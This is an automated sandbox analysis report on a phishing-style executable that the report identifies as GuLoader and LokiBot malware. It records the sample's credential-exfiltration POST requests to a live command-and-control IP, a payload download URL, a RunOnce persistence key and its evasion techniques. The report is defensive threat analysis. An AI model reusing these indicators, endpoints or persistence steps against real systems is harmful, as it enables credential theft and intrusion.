Loading ...

Play interactive tourEdit tour

Analysis Report RFQ#5647201929.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:218796
Start date:30.03.2020
Start time:05:53:54
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 42s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:RFQ#5647201929.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal99.rans.troj.spyw.evad.winEXE@9/4@1/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 25.3% (good quality ratio 10.3%)
  • Quality average: 26.4%
  • Quality standard deviation: 35.7%
HCA Information:
  • Successful, ratio: 90%
  • Number of executed functions: 105
  • Number of non-executed functions: 28
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
  • Excluded IPs from analysis (whitelisted): 172.217.18.174, 2.18.68.82, 205.185.216.10, 205.185.216.42, 93.184.221.240, 2.20.143.23, 2.20.143.16
  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, wu.ec.azureedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, drive.google.com, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold990 - 100false
GuLoader Lokibot
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Registry Run Keys / Startup Folder11Process Injection11Masquerading1Credential Dumping2Virtualization/Sandbox Evasion12Application Deployment SoftwareEmail Collection1Data CompressedStandard Cryptographic Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaGraphical User Interface2Port MonitorsAccessibility FeaturesSoftware Packing1Credentials in Registry1Security Software Discovery311Remote ServicesData from Local System2Exfiltration Over Other Network MediumStandard Non-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionVirtualization/Sandbox Evasion12Input CaptureRemote System Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Application Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingProcess Injection11Credentials in FilesFile and Directory Discovery1Logon ScriptsInput CaptureData EncryptedMultiband CommunicationSIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessScripting11Account ManipulationSystem Information Discovery13Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceObfuscated Files or Information1Brute ForceSystem Owner/User DiscoveryThird-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\Trkvogn\TELETE.exeAvira: detection malicious, Label: HEUR/AGEN.1046816
Antivirus detection for sampleShow sources
Source: RFQ#5647201929.exeAvira: detection malicious, Label: HEUR/AGEN.1046816
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\Trkvogn\TELETE.exeVirustotal: Detection: 11%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: RFQ#5647201929.exeVirustotal: Detection: 11%Perma Link
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 2.2.RFQ#5647201929.exe.2350000.0.unpackAvira: Label: TR/Dropper.Gen

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49748 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49748 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49749 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49749 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49750 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49750 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49751 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49751 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49751 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49751 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49752 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49752 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49752 -> 94.176.239.112:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49752 -> 94.176.239.112:80
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
JA3 SSL client fingerprint seen in connection with other malwareShow sources
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /panel02/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.176.239.112Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E6DA1EF2Content-Length: 176Connection: close
Source: global trafficHTTP traffic detected: POST /panel02/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.176.239.112Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E6DA1EF2Content-Length: 176Connection: close
Source: global trafficHTTP traffic detected: POST /panel02/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.176.239.112Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E6DA1EF2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /panel02/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.176.239.112Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E6DA1EF2Content-Length: 149Connection: close
Source: global trafficHTTP traffic detected: POST /panel02/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.176.239.112Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E6DA1EF2Content-Length: 149Connection: close
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Source: unknownTCP traffic detected without corresponding DNS query: 94.176.239.112
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: doc-0k-6o-docs.googleusercontent.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /panel02/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.176.239.112Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E6DA1EF2Content-Length: 176Connection: close
Urls found in memory or binary dataShow sources
Source: TELETE.exe, 00000004.00000002.802899350.000000001F605000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1.crl0
Source: TELETE.exe, 00000004.00000002.802899350.000000001F605000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: RFQ#5647201929.exe, 00000000.00000002.752595454.00000000021D0000.00000040.00000001.sdmp, RFQ#5647201929.exe, 00000002.00000002.756617158.00000000004F0000.00000040.00000001.sdmp, TELETE.exe, 00000003.00000002.773378940.00000000021C0000.00000040.00000001.sdmp, TELETE.exe, 00000004.00000002.794302606.00000000004F0000.00000040.00000001.sdmpString found in binary or memory: http://myurl/myfile.bin
Source: TELETE.exe, 00000004.00000002.802899350.000000001F605000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
Source: TELETE.exe, 00000004.00000002.802899350.000000001F605000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o10
Source: TELETE.exe, 00000004.00000002.802899350.000000001F605000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: RFQ#5647201929.exe, 00000000.00000002.752595454.00000000021D0000.00000040.00000001.sdmp, RFQ#5647201929.exe, 00000002.00000002.756617158.00000000004F0000.00000040.00000001.sdmp, TELETE.exe, 00000003.00000002.773378940.00000000021C0000.00000040.00000001.sdmp, TELETE.exe, 00000004.00000002.794302606.00000000004F0000.00000040.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1uqQyxL22Ae7En-Yd5pp5Uc9nOK8n0zcP
Source: TELETE.exe, 00000004.00000002.802899350.000000001F605000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747

System Summary:

barindex
Potential malicious icon foundShow sources
Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D2009 NtWriteVirtualMemory,0_2_021D2009
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D022B EnumWindows,NtSetInformationThread,TerminateProcess,0_2_021D022B
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D5D03 NtResumeThread,0_2_021D5D03
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D592C NtProtectVirtualMemory,0_2_021D592C
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D2466 NtWriteVirtualMemory,0_2_021D2466
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D02A6 NtSetInformationThread,TerminateProcess,0_2_021D02A6
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D62C7 NtResumeThread,0_2_021D62C7
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D60C2 NtResumeThread,0_2_021D60C2
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D5EEE NtResumeThread,0_2_021D5EEE
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D211C NtWriteVirtualMemory,0_2_021D211C
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D5D0C NtResumeThread,0_2_021D5D0C
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D2303 NtWriteVirtualMemory,0_2_021D2303
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D5F9A NtResumeThread,0_2_021D5F9A
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D6194 NtResumeThread,0_2_021D6194
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D21B6 NtWriteVirtualMemory,0_2_021D21B6
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_021D5DAC NtResumeThread,0_2_021D5DAC
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 2_2_004F022B EnumWindows,NtSetInformationThread,TerminateProcess,2_2_004F022B
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 2_2_004F592C NtProtectVirtualMemory,2_2_004F592C
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 2_2_004F02A6 NtSetInformationThread,TerminateProcess,2_2_004F02A6
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C2009 NtWriteVirtualMemory,3_2_021C2009
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C022B EnumWindows,NtSetInformationThread,TerminateProcess,3_2_021C022B
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C5D03 NtResumeThread,3_2_021C5D03
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C592C NtProtectVirtualMemory,3_2_021C592C
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C2466 NtWriteVirtualMemory,3_2_021C2466
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C02A6 NtSetInformationThread,TerminateProcess,3_2_021C02A6
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C62C7 NtResumeThread,3_2_021C62C7
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C60C2 NtResumeThread,3_2_021C60C2
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C5EEE NtResumeThread,3_2_021C5EEE
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C211C NtWriteVirtualMemory,3_2_021C211C
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C5D0C NtResumeThread,3_2_021C5D0C
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C2303 NtWriteVirtualMemory,3_2_021C2303
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C5F9A NtResumeThread,3_2_021C5F9A
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C6194 NtResumeThread,3_2_021C6194
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C21B6 NtWriteVirtualMemory,3_2_021C21B6
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 3_2_021C5DAC NtResumeThread,3_2_021C5DAC
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 4_2_004F022B EnumWindows,NtSetInformationThread,4_2_004F022B
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 4_2_004F5D03 NtSetInformationThread,4_2_004F5D03
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 4_2_004F592C NtProtectVirtualMemory,4_2_004F592C
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 4_2_004F62C7 NtSetInformationThread,4_2_004F62C7
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 4_2_004F60C2 NtSetInformationThread,4_2_004F60C2
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 4_2_004F5EEE NtSetInformationThread,4_2_004F5EEE
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 4_2_004F02A6 NtSetInformationThread,4_2_004F02A6
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 4_2_004F5D0C NtSetInformationThread,4_2_004F5D0C
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 4_2_004F5F9A NtSetInformationThread,4_2_004F5F9A
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 4_2_004F6194 NtSetInformationThread,4_2_004F6194
Source: C:\Users\user\Trkvogn\TELETE.exeCode function: 4_2_004F5DAC NtSetInformationThread,4_2_004F5DAC
PE file contains strange resourcesShow sources
Source: RFQ#5647201929.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TELETE.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: RFQ#5647201929.exe, 00000000.00000000.740957273.0000000000418000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCream.exe vs RFQ#5647201929.exe
Source: RFQ#5647201929.exe, 00000000.00000002.752546203.00000000021A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs RFQ#5647201929.exe
Source: RFQ#5647201929.exe, 00000002.00000002.769160984.000000001E900000.00000002.00000001.sdmpBinary or memory string: originalfilename vs RFQ#5647201929.exe
Source: RFQ#5647201929.exe, 00000002.00000002.769160984.000000001E900000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs RFQ#5647201929.exe
Source: RFQ#5647201929.exe, 00000002.00000002.768673642.000000001E8A0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs RFQ#5647201929.exe
Source: RFQ#5647201929.exe, 00000002.00000000.751272611.0000000000418000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCream.exe vs RFQ#5647201929.exe
Source: RFQ#5647201929.exeBinary or memory string: OriginalFilenameCream.exe vs RFQ#5647201929.exe
Classification labelShow sources
Source: classification engineClassification label: mal99.rans.troj.spyw.evad.winEXE@9/4@1/2
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\RFQ#5647201929.exeFile created: C:\Users\user\TrkvognJump to behavior
Creates mutexesShow sources
Source: C:\Users\user\Trkvogn\TELETE.exeMutant created: \Sessions\1\BaseNamedObjects\F7EE0CF1CF93AA2F06F12A09
Executes visual basic scriptsShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Trkvogn\TELETE.vbs'
PE file has an executable .text section and no other executable sectionShow sources
Source: RFQ#5647201929.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic)Show sources
Source: C:\Users\user\Desktop\RFQ#5647201929.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Reads ini filesShow sources
Source: C:\Users\user\Desktop\RFQ#5647201929.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\RFQ#5647201929.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Users\user\Trkvogn\TELETE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: RFQ#5647201929.exeVirustotal: Detection: 11%
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\RFQ#5647201929.exeFile read: C:\Users\user\Desktop\RFQ#5647201929.exeJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\RFQ#5647201929.exe 'C:\Users\user\Desktop\RFQ#5647201929.exe'
Source: unknownProcess created: C:\Users\user\Desktop\RFQ#5647201929.exe 'C:\Users\user\Desktop\RFQ#5647201929.exe'
Source: unknownProcess created: C:\Users\user\Trkvogn\TELETE.exe 'C:\Users\user\Trkvogn\TELETE.exe'
Source: unknownProcess created: C:\Users\user\Trkvogn\TELETE.exe 'C:\Users\user\Trkvogn\TELETE.exe'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Trkvogn\TELETE.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Trkvogn\TELETE.vbs'
Source: C:\Users\user\Desktop\RFQ#5647201929.exeProcess created: C:\Users\user\Desktop\RFQ#5647201929.exe 'C:\Users\user\Desktop\RFQ#5647201929.exe' Jump to behavior
Source: C:\Users\user\Desktop\RFQ#5647201929.exeProcess created: C:\Users\user\Trkvogn\TELETE.exe 'C:\Users\user\Trkvogn\TELETE.exe' Jump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess created: C:\Users\user\Trkvogn\TELETE.exe 'C:\Users\user\Trkvogn\TELETE.exe' Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\RFQ#5647201929.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Found GUI installer (many successful clicks)Show sources
Source: C:\Windows\System32\wscript.exeAutomated click: OK
Source: C:\Windows\System32\wscript.exeAutomated click: OK
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Users\user\Trkvogn\TELETE.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

Data Obfuscation:

barindex
Yara detected GuLoaderShow sources
Source: Yara matchFile source: Process Memory Space: TELETE.exe PID: 932, type: MEMORY
Source: Yara matchFile source: Process Memory Space: RFQ#5647201929.exe PID: 4916, type: MEMORY
Source: Yara matchFile source: Process Memory Space: TELETE.exe PID: 4944, type: MEMORY
Source: Yara matchFile source: Process Memory Space: RFQ#5647201929.exe PID: 4712, type: MEMORY
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_0040AE72 push ebp; retf 0_2_0040AE73
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_0040D2F7 push ecx; iretd 0_2_0040D2F8
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_004068AD push 00000003h; ret 0_2_004068B0
Source: C:\Users\user\Desktop\RFQ#5647201929.exeCode function: 0_2_00406BE2 push ebx; ret 0_2_00406CFA

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Users\user\Desktop\RFQ#5647201929.exeFile created: C:\Users\user\Trkvogn\TELETE.exeJump to dropped file

Boot Survival:

barindex
Creates autostart registry keys with suspicious values (likely registry only malware)Show sources
Source: C:\Users\user\Desktop\RFQ#5647201929.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ORDREMO C:\Users\user\Trkvogn\TELETE.vbsJump to behavior
Source: C:\Users\user\Desktop\RFQ#5647201929.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ORDREMO C:\Users\user\Trkvogn\TELETE.vbsJump to behavior
Creates an autostart registry keyShow sources
Source: C:\Users\user\Desktop\RFQ#5647201929.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ORDREMOJump to behavior
Source: C:\Users\user\Desktop\RFQ#5647201929.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ORDREMOJump to behavior
Source: C:\Users\user\Desktop\RFQ#5647201929.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ORDREMOJump to behavior
Source: C:\Users\user\Desktop\RFQ#5647201929.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ORDREMOJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\RFQ#5647201929.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RFQ#5647201929.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RFQ#5647201929.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RFQ#5647201929.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RFQ#5647201929.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RFQ#5647201929.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RFQ#5647201929.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RFQ#5647201929.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RFQ#5647201929.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RFQ#5647201929.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RFQ#5647201929.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\RFQ#5647201929.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Trkvogn\TELETE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
